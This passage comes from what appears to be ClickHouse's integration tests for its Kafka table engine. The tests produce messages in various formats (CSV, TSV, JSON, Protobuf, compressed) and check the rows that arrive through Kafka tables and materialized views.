00\x00\x10\x00\x00\x00\x07\x00\x00\x00\x62\x6c\x6f\x63\x6b\x4e\x6f\x00\x10\x00\x14\x00\x08\x00\x00\x00\x07\x00\x0c\x00\x00\x00\x10\x00\x10\x00\x00\x00\x00\x00\x00\x02\x24\x00\x00\x00\x14\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x08\x00\x0c\x00\x08\x00\x07\x00\x08\x00\x00\x00\x00\x00\x00\x01\x40\x00\x00\x00\x02\x00\x00\x00\x69\x64\x00\x00\xff\xff\xff\xff\x58\x01\x00\x00\x14\x00\x00\x00\x00\x00\x00\x00\x0c\x00\x16\x00\x06\x00\x05\x00\x08\x00\x0c\x00\x0c\x00\x00\x00\x00\x03\x03\x00\x18\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00\x00\x00\x00\x0a\x00\x18\x00\x0c\x00\x04\x00\x08\x00\x0a\x00\x00\x00\xcc\x00\x00\x00\x10\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x0b\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\x00\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x18\x00\x00\x00\x00\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x20\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x20\x00\x00\x00\x00\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x28\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x28\x00\x00\x00\x00\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x05\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x00\x00\x00\x41\x4d\x00\x00\x00\x00\x00\x00\x00\x00\x00\x3f\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\xff\xff\xff\xff\x00\x00\x00\x00',
],
},
}
for format_name, format_opts in list(all_formats.items()):
logging.debug(('Set up {}'.format(format_name)))
topic_name = 'format_tests_{}'.format(format_name)
data_sample = format_opts['data_sample']
data_prefix = []
# prepend empty value when supported
if format_opts.get('supports_empty_value', False):
data_prefix = data_prefix + ['']
kafka_produce(kafka_cluster, topic_name, data_prefix + data_sample)
instance.query('''
DROP TABLE IF EXISTS test.kafka_{format_name};
CREATE TABLE test.kafka_{format_name} (
id Int64,
blockNo UInt16,
val1 String,
val2 Float32,
val3 UInt8
) ENGINE = Kafka()
SETTINGS kafka_broker_list = 'kafka1:19092',
kafka_topic_list = '{topic_name}',
kafka_group_name = '{topic_name}_group',
kafka_format = '{format_name}',
kafka_flush_interval_ms = 1000 {extra_settings};
DROP TABLE IF EXISTS test.kafka_{format_name}_mv;
CREATE MATERIALIZED VIEW test.kafka_{format_name}_mv Engine=Log AS
SELECT *, _topic, _partition, _offset FROM test.kafka_{format_name};
'''.format(topic_name=topic_name, format_name=format_name,
extra_settings=format_opts.get('extra_settings') or ''))
instance.wait_for_log_line('kafka.*Committed offset [0-9]+.*format_tests_', repetitions=len(all_formats.keys()), look_behind_lines=12000)
for format_name, format_opts in list(all_formats.items()):
logging.debug(('Checking {}'.format(format_name)))
topic_name = f'format_tests_{format_name}'
# shift offsets by 1 if format supports empty value
offsets = [1, 2, 3] if format_opts.get('supports_empty_value', False) else [0, 1, 2]
result = instance.query('SELECT * FROM test.kafka_{format_name}_mv;'.format(format_name=format_name))
expected = '''\
0 0 AM 0.5 1 {topic_name} 0 {offset_0}
1 0 AM 0.5 1 {topic_name} 0 {offset_1}
2 0 AM 0.5 1 {topic_name} 0 {offset_1}
3 0 AM 0.5 1 {topic_name} 0 {offset_1}
4 0 AM 0.5 1 {topic_name} 0 {offset_1}
5 0 AM 0.5 1 {topic_name} 0 {offset_1}
6 0 AM 0.5 1 {topic_name} 0 {offset_1}
7 0 AM 0.5 1 {topic_name} 0 {offset_1}
8 0 AM 0.5 1 {topic_name} 0 {offset_1}
9 0 AM 0.5 1 {topic_name} 0 {offset_1}
10 0 AM 0.5 1 {topic_name} 0 {offset_1}
11 0 AM 0.5 1 {topic_name} 0 {offset_1}
12 0 AM 0.5 1 {topic_name} 0 {offset_1}
13 0 AM 0.5 1 {topic_name} 0 {offset_1}
14 0 AM 0.5 1 {topic_name} 0 {offset_1}
15 0 AM 0.5 1 {topic_name} 0 {offset_1}
0 0 AM 0.5 1 {topic_name} 0 {offset_2}
'''.format(topic_name=topic_name, offset_0=offsets[0], offset_1=offsets[1], offset_2=offsets[2])
assert TSV(result) == TSV(expected), 'Proper result for format: {}'.format(format_name)
kafka_delete_topic(admin_client, topic_name)
# Since everything is async and shaky when receiving messages from Kafka,
# we may want to try and check results multiple times in a loop.
def kafka_check_result(result, check=False, ref_file='test_kafka_json.reference'):
fpath = p.join(p.dirname(__file__), ref_file)
with open(fpath) as reference:
if check:
assert TSV(result) == TSV(reference)
else:
return TSV(result) == TSV(reference)
def decode_avro(message):
b = io.BytesIO(message)
ret = avro.datafile.DataFileReader(b, avro.io.DatumReader())
output = io.StringIO()
for record in ret:
print(record, file=output)
return output.getvalue()
# https://stackoverflow.com/a/57692111/1555175
def describe_consumer_group(kafka_cluster, name):
client = BrokerConnection('localhost', kafka_cluster.kafka_port, socket.AF_INET)
client.connect_blocking()
list_members_in_groups = DescribeGroupsRequest_v1(groups=[name])
future = client.send(list_members_in_groups)
while not future.is_done:
for resp, f in client.recv():
f.success(resp)
(error_code, group_id, state, protocol_type, protocol, members) = future.value.groups[0]
res = []
for member in members:
(member_id, client_id, client_host, member_metadata, member_assignment) = member
member_info = {}
member_info['member_id'] = member_id
member_info['client_id'] = client_id
member_info['client_host'] = client_host
member_topics_assignment = []
for (topic, partitions) in MemberAssignment.decode(member_assignment).assignment:
member_topics_assignment.append({'topic': topic, 'partitions': partitions})
member_info['assignment'] = member_topics_assignment
res.append(member_info)
return res
# Fixtures
@pytest.fixture(scope="module")
def kafka_cluster():
try:
cluster.start()
kafka_id = instance.cluster.kafka_docker_id
print(("kafka_id is {}".format(kafka_id)))
yield cluster
finally:
cluster.shutdown()
@pytest.fixture(autouse=True)
def kafka_setup_teardown():
instance.query('DROP DATABASE IF EXISTS test; CREATE DATABASE test;')
# logging.debug("kafka is available - running test")
yield # run test
# Tests
def test_kafka_issue11308(kafka_cluster):
# Check that matview does respect Kafka SETTINGS
kafka_produce(kafka_cluster, 'issue11308', ['{"t": 123, "e": {"x": "woof"} }', '{"t": 123, "e": {"x": "woof"} }',
'{"t": 124, "e": {"x": "test"} }'])
instance.query('''
CREATE TABLE test.persistent_kafka (
time UInt64,
some_string String
)
ENGINE = MergeTree()
ORDER BY time;
CREATE TABLE test.kafka (t UInt64, `e.x` String)
ENGINE = Kafka
SETTINGS kafka_broker_list = 'kafka1:19092',
kafka_topic_list = 'issue11308',
kafka_group_name = 'issue11308',
kafka_format = 'JSONEachRow',
kafka_row_delimiter = '\\n',
kafka_flush_interval_ms=1000,
input_format_import_nested_json = 1;
CREATE MATERIALIZED VIEW test.persistent_kafka_mv TO test.persistent_kafka AS
SELECT
`t` AS `time`,
`e.x` AS `some_string`
FROM test.kafka;
''')
while int(instance.query('SELECT count() FROM test.persistent_kafka')) < 3:
time.sleep(1)
result = instance.query('SELECT * FROM test.persistent_kafka ORDER BY time;')
instance.query('''
DROP TABLE test.persistent_kafka;
DROP TABLE test.persistent_kafka_mv;
''')
expected = '''\
123 woof
123 woof
124 test
'''
assert TSV(result) == TSV(expected)
def test_kafka_issue4116(kafka_cluster):
# Check that format_csv_delimiter parameter works now - as part of all available format settings.
kafka_produce(kafka_cluster, 'issue4116', ['1|foo', '2|bar', '42|answer', '100|multi\n101|row\n103|message'])
instance.query('''
CREATE TABLE test.kafka (a UInt64, b String)
ENGINE = Kafka
SETTINGS kafka_broker_list = 'kafka1:19092',
kafka_topic_list = 'issue4116',
kafka_group_name = 'issue4116',
kafka_commit_on_select = 1,
kafka_format = 'CSV',
kafka_row_delimiter = '\\n',
format_csv_delimiter = '|';
''')
result = instance.query('SELECT * FROM test.kafka ORDER BY a;')
expected = '''\
1 foo
2 bar
42 answer
100 multi
101 row
103 message
'''
assert TSV(result) == TSV(expected)
def test_kafka_consumer_hang(kafka_cluster):
admin_client = KafkaAdminClient(bootstrap_servers="localhost:{}".format(kafka_cluster.kafka_port))
topic_name = "consumer_hang"
kafka_create_topic(admin_client, topic_name, num_partitions=8)
instance.query(f'''
DROP TABLE IF EXISTS test.kafka;
DROP TABLE IF EXISTS test.view;
DROP TABLE IF EXISTS test.consumer;
CREATE TABLE test.kafka (key UInt64, value UInt64)
ENGINE = Kafka
SETTINGS kafka_broker_list = 'kafka1:19092',
kafka_topic_list = '{topic_name}',
kafka_group_name = '{topic_name}',
kafka_format = 'JSONEachRow',
kafka_num_consumers = 8;
CREATE TABLE test.view (key UInt64, value UInt64) ENGINE = Memory();
CREATE MATERIALIZED VIEW test.consumer TO test.view AS SELECT * FROM test.kafka;
''')
instance.wait_for_log_line('kafka.*Stalled', repetitions=20)
# This should trigger heartbeat fail,
# which will trigger REBALANCE_IN_PROGRESS,
# and which can lead to consumer hang.
kafka_cluster.pause_container('kafka1')
instance.wait_for_log_line('heartbeat error')
kafka_cluster.unpause_container('kafka1')
# logging.debug("Attempt to drop")
instance.query('DROP TABLE test.kafka')
# kafka_cluster.open_bash_shell('instance')
instance.query('''
DROP TABLE test.consumer;
DROP TABLE test.view;
''')
# original problem appearance was a sequence of the following messages in librdkafka logs:
# BROKERFAIL -> |ASSIGN| -> REBALANCE_IN_PROGRESS -> "waiting for rebalance_cb" (repeated forever)
# so it was waiting forever while the application will execute queued rebalance callback
# from a user perspective: we expect no hanging 'drop' queries
# 'dr'||'op' to avoid self matching
assert int(instance.query("select count() from system.processes where position(lower(query),'dr'||'op')>0")) == 0
# cleanup unread messages so kafka will not wait reading consumers to delete topic
instance.query(f'''
CREATE TABLE test.kafka (key UInt64)
ENGINE = Kafka
SETTINGS kafka_broker_list = 'kafka1:19092',
kafka_topic_list = '{topic_name}',
kafka_commit_on_select = 1,
kafka_group_name = '{topic_name}',
kafka_format = 'JSONEachRow',
kafka_num_consumers = 8;
''')
num_read = int(instance.query('SELECT count() FROM test.kafka'))
logging.debug(f"read {num_read} from {topic_name} before delete")
instance.query('DROP TABLE test.kafka')
kafka_delete_topic(admin_client, topic_name)
def test_kafka_consumer_hang2(kafka_cluster):
admin_client = KafkaAdminClient(bootstrap_servers="localhost:{}".format(kafka_cluster.kafka_port))
topic_name = "consumer_hang2"
kafka_create_topic(admin_client, topic_name)
instance.query('''
DROP TABLE IF EXISTS test.kafka;
CREATE TABLE test.kafka (key UInt64, value UInt64)
ENGINE = Kafka
SETTINGS kafka_broker_list = 'kafka1:19092',
kafka_topic_list = 'consumer_hang2',
kafka_group_name = 'consumer_hang2',
kafka_commit_on_select = 1,
kafka_format = 'JSONEachRow';
CREATE TABLE test.kafka2 (key UInt64, value UInt64)
ENGINE = Kafka
SETTINGS kafka_broker_list = 'kafka1:19092',
kafka_topic_list = 'consumer_hang2',
kafka_commit_on_select = 1,
kafka_group_name = 'consumer_hang2',
kafka_format = 'JSONEachRow';
''')
# first consumer subscribe the topic, try to poll some data, and go to rest
instance.query('SELECT * FROM test.kafka')
# second consumer do the same leading to rebalance in the first
# consumer, try to poll some data
instance.query('SELECT * FROM test.kafka2')
# echo 'SELECT * FROM test.kafka; SELECT * FROM test.kafka2; DROP TABLE test.kafka;' | clickhouse client -mn &
# kafka_cluster.open_bash_shell('instance')
# first consumer has pending rebalance callback unprocessed (no poll after select)
# one of those queries was failing because of
# https://github.com/edenhill/librdkafka/issues/2077
# https://github.com/edenhill/librdkafka/issues/2898
instance.query('DROP TABLE test.kafka')
instance.query('DROP TABLE test.kafka2')
# from a user perspective: we expect no hanging 'drop' queries
# 'dr'||'op' to avoid self matching
assert int(instance.query("select count() from system.processes where position(lower(query),'dr'||'op')>0")) == 0
kafka_delete_topic(admin_client, topic_name)
def test_kafka_csv_with_delimiter(kafka_cluster):
messages = []
for i in range(50):
messages.append('{i}, {i}'.format(i=i))
kafka_produce(kafka_cluster, 'csv', messages)
instance.query('''
CREATE TABLE test.kafka (key UInt64, value UInt64)
ENGINE = Kafka
SETTINGS kafka_broker_list = 'kafka1:19092',
kafka_topic_list = 'csv',
kafka_commit_on_select = 1,
kafka_group_name = 'csv',
kafka_format = 'CSV';
''')
result = ''
while True:
result += instance.query('SELECT * FROM test.kafka', ignore_error=True)
if kafka_check_result(result):
break
kafka_check_result(result, True)
def test_kafka_tsv_with_delimiter(kafka_cluster):
messages = []
for i in range(50):
messages.append('{i}\t{i}'.format(i=i))
kafka_produce(kafka_cluster, 'tsv', messages)
instance.query('''
CREATE TABLE test.kafka (key UInt64, value UInt64)
ENGINE = Kafka
SETTINGS kafka_broker_list = 'kafka1:19092',
kafka_topic_list = 'tsv',
kafka_commit_on_select = 1,
kafka_group_name = 'tsv',
kafka_format = 'TSV';
''')
result = ''
while True:
result += instance.query('SELECT * FROM test.kafka', ignore_error=True)
if kafka_check_result(result):
break
kafka_check_result(result, True)
def test_kafka_select_empty(kafka_cluster):
admin_client = KafkaAdminClient(bootstrap_servers="localhost:{}".format(kafka_cluster.kafka_port))
topic_name = "empty"
kafka_create_topic(admin_client, topic_name)
instance.query(f'''
CREATE TABLE test.kafka (key UInt64)
ENGINE = Kafka
SETTINGS kafka_broker_list = 'kafka1:19092',
kafka_topic_list = '{topic_name}',
kafka_commit_on_select = 1,
kafka_group_name = '{topic_name}',
kafka_format = 'TSV',
kafka_row_delimiter = '\\n';
''')
assert int(instance.query('SELECT count() FROM test.kafka')) == 0
kafka_delete_topic(admin_client, topic_name)
def test_kafka_json_without_delimiter(kafka_cluster):
messages = ''
for i in range(25):
messages += json.dumps({'key': i, 'value': i}) + '\n'
kafka_produce(kafka_cluster, 'json', [messages])
messages = ''
for i in range(25, 50):
messages += json.dumps({'key': i, 'value': i}) + '\n'
kafka_produce(kafka_cluster, 'json', [messages])
instance.query('''
CREATE TABLE test.kafka (key UInt64, value UInt64)
ENGINE = Kafka
SETTINGS kafka_broker_list = 'kafka1:19092',
kafka_topic_list = 'json',
kafka_group_name = 'json',
kafka_commit_on_select = 1,
kafka_format = 'JSONEachRow';
''')
result = ''
while True:
result += instance.query('SELECT * FROM test.kafka', ignore_error=True)
if kafka_check_result(result):
break
kafka_check_result(result, True)
def test_kafka_protobuf(kafka_cluster):
kafka_produce_protobuf_messages(kafka_cluster, 'pb', 0, 20)
kafka_produce_protobuf_messages(kafka_cluster, 'pb', 20, 1)
kafka_produce_protobuf_messages(kafka_cluster, 'pb', 21, 29)
instance.query('''
CREATE TABLE test.kafka (key UInt64, value String)
ENGINE = Kafka
SETTINGS kafka_broker_list = 'kafka1:19092',
kafka_topic_list = 'pb',
kafka_group_name = 'pb',
kafka_format = 'Protobuf',
kafka_commit_on_select = 1,
kafka_schema = 'kafka.proto:KeyValuePair';
''')
result = ''
while True:
result += instance.query('SELECT * FROM test.kafka', ignore_error=True)
if kafka_check_result(result):
break
kafka_check_result(result, True)
def test_kafka_string_field_on_first_position_in_protobuf(kafka_cluster):
# https://github.com/ClickHouse/ClickHouse/issues/12615
kafka_produce_protobuf_social(kafka_cluster, 'string_field_on_first_position_in_protobuf', 0, 20)
kafka_produce_protobuf_social(kafka_cluster, 'string_field_on_first_position_in_protobuf', 20, 1)
kafka_produce_protobuf_social(kafka_cluster, 'string_field_on_first_position_in_protobuf', 21, 29)
instance.query('''
CREATE TABLE test.kafka (
username String,
timestamp Int32
) ENGINE = Kafka()
SETTINGS
kafka_broker_list = 'kafka1:19092',
kafka_topic_list = 'string_field_on_first_position_in_protobuf',
kafka_group_name = 'string_field_on_first_position_in_protobuf',
kafka_format = 'Protobuf',
kafka_commit_on_select = 1,
kafka_schema = 'social:User';
''')
result = instance.query('SELECT * FROM test.kafka', ignore_error=True)
expected = '''\
John Doe 0 1000000
John Doe 1 1000001
John Doe 2 1000002
John Doe 3 1000003
John Doe 4 1000004
John Doe 5 1000005
John Doe 6 1000006
John Doe 7 1000007
John Doe 8 1000008
John Doe 9 1000009
John Doe 10 1000010
John Doe 11 1000011
John Doe 12 1000012
John Doe 13 1000013
John Doe 14 1000014
John Doe 15 1000015
John Doe 16 1000016
John Doe 17 1000017
John Doe 18 1000018
John Doe 19 1000019
John Doe 20 1000020
John Doe 21 1000021
John Doe 22 1000022
John Doe 23 1000023
John Doe 24 1000024
John Doe 25 1000025
John Doe 26 1000026
John Doe 27 1000027
John Doe 28 1000028
John Doe 29 1000029
John Doe 30 1000030
John Doe 31 1000031
John Doe 32 1000032
John Doe 33 1000033
John Doe 34 1000034
John Doe 35 1000035
John Doe 36 1000036
John Doe 37 1000037
John Doe 38 1000038
John Doe 39 1000039
John Doe 40 1000040
John Doe 41 1000041
John Doe 42 1000042
John Doe 43 1000043
John Doe 44 1000044
John Doe 45 1000045
John Doe 46 1000046
John Doe 47 1000047
John Doe 48 1000048
John Doe 49 1000049
'''
assert TSV(result) == TSV(expected)
def test_kafka_protobuf_no_delimiter(kafka_cluster):
instance.query('''
CREATE TABLE test.kafka (key UInt64, value String)
ENGINE = Kafka
SETTINGS kafka_broker_list = 'kafka1:19092',
kafka_topic_list = 'pb_no_delimiter',
kafka_group_name = 'pb_no_delimiter',
kafka_format = 'ProtobufSingle',
kafka_commit_on_select = 1,
kafka_schema = 'kafka.proto:KeyValuePair';
''')
kafka_produce_protobuf_messages_no_delimeters(kafka_cluster, 'pb_no_delimiter', 0, 20)
kafka_produce_protobuf_messages_no_delimeters(kafka_cluster, 'pb_no_delimiter', 20, 1)
kafka_produce_protobuf_messages_no_delimeters(kafka_cluster, 'pb_no_delimiter', 21, 29)
result = ''
while True:
result += instance.query('SELECT * FROM test.kafka', ignore_error=True)
if kafka_check_result(result):
break
kafka_check_result(result, True)
instance.query('''
CREATE TABLE test.kafka_writer (key UInt64, value String)
ENGINE = Kafka
SETTINGS kafka_broker_list = 'kafka1:19092',
kafka_topic_list = 'pb_no_delimiter',
kafka_group_name = 'pb_no_delimiter',
kafka_format = 'ProtobufSingle',
kafka_commit_on_select = 1,
kafka_schema = 'kafka.proto:KeyValuePair';
''')
instance.query("INSERT INTO test.kafka_writer VALUES (13,'Friday'),(42,'Answer to the Ultimate Question of Life, the Universe, and Everything'), (110, 'just a number')")
time.sleep(1)
result = instance.query("SELECT * FROM test.kafka ORDER BY key", ignore_error=True)
expected = '''\
13 Friday
42 Answer to the Ultimate Question of Life, the Universe, and Everything
110 just a number
'''
assert TSV(result) == TSV(expected)
def test_kafka_materialized_view(kafka_cluster):
instance.query('''
DROP TABLE IF EXISTS test.view;
DROP TABLE IF EXISTS test.consumer;
CREATE TABLE test.kafka (key UInt64, value UInt64)
ENGINE = Kafka
SETTINGS kafka_broker_list = 'kafka1:19092',
kafka_topic_list = 'mv',
kafka_group_name = 'mv',
kafka_format = 'JSONEachRow',
kafka_row_delimiter = '\\n';
CREATE TABLE test.view (key UInt64, value UInt64)
ENGINE = MergeTree()
ORDER BY key;
CREATE MATERIALIZED VIEW test.consumer TO test.view AS
SELECT * FROM test.kafka;
''')
messages = []
for i in range(50):
messages.append(json.dumps({'key': i, 'value': i}))
kafka_produce(kafka_cluster, 'mv', messages)
while True:
result = instance.query('SELECT * FROM test.view')
if kafka_check_result(result):
break
instance.query('''
DROP TABLE test.consumer;
DROP TABLE test.view;
''')
kafka_check_result(result, True)
def test_kafka_recreate_kafka_table(kafka_cluster):
'''
Checks that materialized view work properly after dropping and recreating the Kafka table.
'''
# line for backporting:
# admin_client = KafkaAdminClient(bootstrap_servers="localhost:9092")
admin_client = KafkaAdminClient(bootstrap_servers="localhost:{}".format(kafka_cluster.kafka_port))
topic_name = "recreate_kafka_table"
kafka_create_topic(admin_client, topic_name, num_partitions=6)
instance.query('''
DROP TABLE IF EXISTS test.view;
DROP TABLE IF EXISTS test.consumer;
CREATE TABLE test.kafka (key UInt64, value UInt64)
ENGINE = Kafka
SETTINGS kafka_broker_list = 'kafka1:19092',
kafka_topic_list = 'recreate_kafka_table',
kafka_group_name = 'recreate_kafka_table_group',
kafka_format = 'JSONEachRow',
kafka_num_consumers = 6,
kafka_flush_interval_ms = 1000,
kafka_skip_broken_messages = 1048577;
CREATE TABLE test.view (key UInt64, value UInt64)
ENGINE = MergeTree()
ORDER BY key;
CREATE MATERIALIZED VIEW test.consumer TO test.view AS
SELECT * FROM test.kafka;
''')
messages = []
for i in range(120):
messages.append(json.dumps({'key': i, 'value': i}))
kafka_produce(kafka_cluster,'recreate_kafka_table', messages)
instance.wait_for_log_line('kafka.*Committed offset [0-9]+.*recreate_kafka_table', repetitions=6, look_behind_lines=100)
instance.query('''
DROP TABLE test.kafka;
''')
kafka_produce(kafka_cluster,'recreate_kafka_table', messages)
instance.query('''
CREATE TABLE test.kafka (key UInt64, value UInt64)
ENGINE = Kafka
SETTINGS kafka_broker_list = 'kafka1:19092',
kafka_topic_list = 'recreate_kafka_table',
kafka_group_name = 'recreate_kafka_table_group',
kafka_format = 'JSONEachRow',
kafka_num_consumers = 6,
kafka_flush_interval_ms = 1000,
kafka_skip_broken_messages = 1048577;
''')
instance.wait_for_log_line('kafka.*Committed offset [0-9]+.*recreate_kafka_table', repetitions=6, look_behind_lines=100)
# data was not flushed yet (it will be flushed 7.5 sec after creating MV)
assert int(instance.query("SELECT count() FROM test.view")) == 240
instance.query('''
DROP TABLE test.consumer;
DROP TABLE test.view;
''')
kafka_delete_topic(admin_client, topic_name)
def test_librdkafka_compression(kafka_cluster):
"""
Regression for UB in snappy-c (that is used in librdkafka),
backport pr is [1].
[1]: https://github.com/ClickHouse-Extras/librdkafka/pull/3
Example of corruption:
2020.12.10 09:59:56.831507 [ 20 ] {} <Error> void DB::StorageKafka::threadFunc(size_t): Code: 27. DB::Exception: Cannot parse input: expected '"' before: 'foo"}': (while reading the value of key value): (at row 1)
To trigger this regression there should duplicated messages
Orignal reproducer is:
$ gcc --version |& fgrep gcc
gcc (GCC) 10.2.0
$ yes foobarbaz | fold -w 80 | head -n10 >| in-…
$ make clean && make CFLAGS='-Wall -g -O2 -ftree-loop-vectorize -DNDEBUG=1 -DSG=1 -fPIC'
$ ./verify in
final comparision of in failed at 20 of 100
"""
supported_compression_types = ['gzip', 'snappy', 'lz4', 'zstd', 'uncompressed']
messages = []
expected = []
value = 'foobarbaz'*10
number_of_messages = 50
for i in range(number_of_messages):
messages.append(json.dumps({'key': i, 'value': value}))
expected.append(f'{i}\t{value}')
expected = '\n'.join(expected)
for compression_type in supported_compression_types:
logging.debug(('Check compression {}'.format(compression_type)))
topic_name = 'test_librdkafka_compression_{}'.format(compression_type)
admin_client = KafkaAdminClient(bootstrap_servers="localhost:{}".format(kafka_cluster.kafka_port))
kafka_create_topic(admin_client, topic_name, config={'compression.type': compression_type})
instance.query('''
CREATE TABLE test.kafka (key UInt64, value String)
ENGINE = Kafka
SETTINGS kafka_broker_list = 'kafka1:19092',
kafka_topic_list = '{topic_name}',
kafka_group_name = '{topic_name}_group',
kafka_format = 'JSONEachRow',
kafka_flush_interval_ms = 1000;
CREATE MATERIALIZED VIEW test.consumer Engine=Log AS
SELECT * FROM test.kafka;
'''.format(topic_name=topic_name) )
kafka_produce(kafka_cluster, topic_name, messages)
instance.wait_for_log_line("Committed offset {}".format(number_of_messages))
result = instance.query('SELECT * FROM test.consumer')
assert TSV(result) == TSV(expected)
instance.query('DROP TABLE test.kafka SYNC')
instance.query('DROP TABLE test.consumer SYNC')
kafka_delete_topic(admin_client, topic_name)
def test_kafka_materialized_view_with_subquery(kafka_cluster):
instance.query('''
DROP TABLE IF EXISTS test.view;
DROP TABLE IF EXISTS test.consumer;
CREATE TABLE test.kafka (key UInt64, value UInt64)
ENGINE = Kafka
SETTINGS kafka_broker_list = 'kafka1:19092',
kafka_topic_list = 'mvsq',
kafka_group_name = 'mvsq',
kafka_format = 'JSONEachRow',
kafka_row_delimiter = '\\n';
CREATE TABLE test.view (key UInt64, value UInt64)
ENGINE = MergeTree()
ORDER BY key;
CREATE MATERIALIZED VIEW test.consumer TO test.view AS
SELECT * FROM (SELECT * FROM test.kafka);
''')
messages = []
for i in range(50):
messages.append(json.dumps({'key': i, 'value': i}))
kafka_produce(kafka_cluster, 'mvsq', messages)
while True:
result = instance.query('SELECT * FROM test.view')
if kafka_check_result(result):
break
instance.query('''
DROP TABLE test.consumer;
DROP TABLE test.view;
''')
kafka_check_result(result, True)
def test_kafka_many_materialized_views(kafka_cluster):
instance.query('''
DROP TABLE IF EXISTS test.view1;
DROP TABLE IF EXISTS test.view2;
DROP TABLE IF EXISTS test.consumer1;
DROP TABLE IF EXISTS test.consumer2;
CREATE TABLE test.kafka (key UInt64, value UInt64)
ENGINE = Kafka
SETTINGS kafka_broker_list = 'kafka1:19092',
kafka_topic_list = 'mmv',
kafka_group_name = 'mmv',
kafka_format = 'JSONEachRow',
kafka_row_delimiter = '\\n';
CREATE TABLE test.view1 (key UInt64, value UInt64)
ENGINE = MergeTree()
ORDER BY key;
CREATE TABLE test.view2 (key UInt64, value UInt64)
ENGINE = MergeTree()
ORDER BY key;
CREATE MATERIALIZED VIEW test.consumer1 TO test.view1 AS
SELECT * FROM test.kafka;
CREATE MATERIALIZED VIEW test.consumer2 TO test.view2 AS
SELECT * FROM test.kafka;
''')
messages = []
for i in range(50):
messages.append(json.dumps({'key': i, 'value': i}))
kafka_produce(kafka_cluster, 'mmv', messages)
while True:
result1 = instance.query('SELECT * FROM test.view1')
result2 = instance.query('SELECT * FROM test.view2')
if kafka_check_result(result1) and kafka_check_result(result2):
break
instance.query('''
DROP TABLE test.consumer1;
DROP TABLE test.consumer2;
DROP TABLE test.view1;
DROP TABLE test.view2;
''')
kafka_check_result(result1, True)
kafka_check_result(result2, True)
def test_kafka_flush_on_big_message(kafka_cluster):
# Create batchs of messages of size ~100Kb
kafka_messages = 1000
batch_messages = 1000
messages = [json.dumps({'key': i, 'value': 'x' * 100}) * batch_messages for i in range(kafka_messages)]
kafka_produce(kafka_cluster, 'flush', messages)
instance.query('''
DROP TABLE IF EXISTS test.view;
DROP TABLE IF EXISTS test.consumer;
CREATE TABLE test.kafka (key UInt64, value String)
ENGINE = Kafka
SETTINGS kafka_broker_list = 'kafka1:19092',
kafka_topic_list = 'flush',
kafka_group_name = 'flush',
kafka_format = 'JSONEachRow',
kafka_max_block_size = 10;
CREATE TABLE test.view (key UInt64, value String)
ENGINE = MergeTree
ORDER BY key;
CREATE MATERIALIZED VIEW test.consumer TO test.view AS
SELECT * FROM test.kafka;
''')
client = KafkaAdminClient(bootstrap_servers="localhost:{}".format(kafka_cluster.kafka_port))
received = False
while not received:
try:
offsets = client.list_consumer_group_offsets('flush')
for topic, offset in list(offsets.items()):
if topic.topic == 'flush' and offset.offset == kafka_messages:
received = True
break
except kafka.errors.GroupCoordinatorNotAvailableError:
continue
while True:
result = instance.query('SELECT count() FROM test.view')
if int(result) == kafka_messages * batch_messages:
break
instance.query('''
DROP TABLE test.consumer;
DROP TABLE test.view;
''')
assert int(result) == kafka_messages * batch_messages, 'ClickHouse lost some messages: {}'.format(result)
def test_kafka_virtual_columns(kafka_cluster):
admin_client = KafkaAdminClient(bootstrap_servers="localhost:{}".format(kafka_cluster.kafka_port))
topic_config = {
# default retention, since predefined timestamp_ms is used.
'retention.ms': '-1',
}
kafka_create_topic(admin_client, "virt1", config=topic_config)
instance.query('''
CREATE TABLE test.kafka (key UInt64, value UInt64)
ENGINE = Kafka
SETTINGS kafka_broker_list = 'kafka1:19092',
kafka_topic_list = 'virt1',
kafka_group_name = 'virt1',
kafka_commit_on_select = 1,
kafka_format = 'JSONEachRow';
''')
messages = ''
for i in range(25):
messages += json.dumps({'key': i, 'value': i}) + '\n'
kafka_produce(kafka_cluster, 'virt1', [messages], 0)
messages = ''
for i in range(25, 50):
messages += json.dumps({'key': i, 'value': i}) + '\n'
kafka_produce(kafka_cluster, 'virt1', [messages], 0)
result = ''
while True:
result += instance.query(
'''SELECT _key, key, _topic, value, _offset, _partition, _timestamp = 0 ? '0000-00-00 00:00:00' : toString(_timestamp) AS _timestamp FROM test.kafka''',
ignore_error=True)
if kafka_check_result(result, False, 'test_kafka_virtual1.reference'):
break
kafka_check_result(result, True, 'test_kafka_virtual1.reference')
def test_kafka_virtual_columns_with_materialized_view(kafka_cluster):
admin_client = KafkaAdminClient(bootstrap_servers="localhost:{}".format(kafka_cluster.kafka_port))
topic_config = {
# default retention, since predefined timestamp_ms is used.
'retention.ms': '-1',
}
kafka_create_topic(admin_client, "virt2", config=topic_config)
instance.query('''
DROP TABLE IF EXISTS test.view;
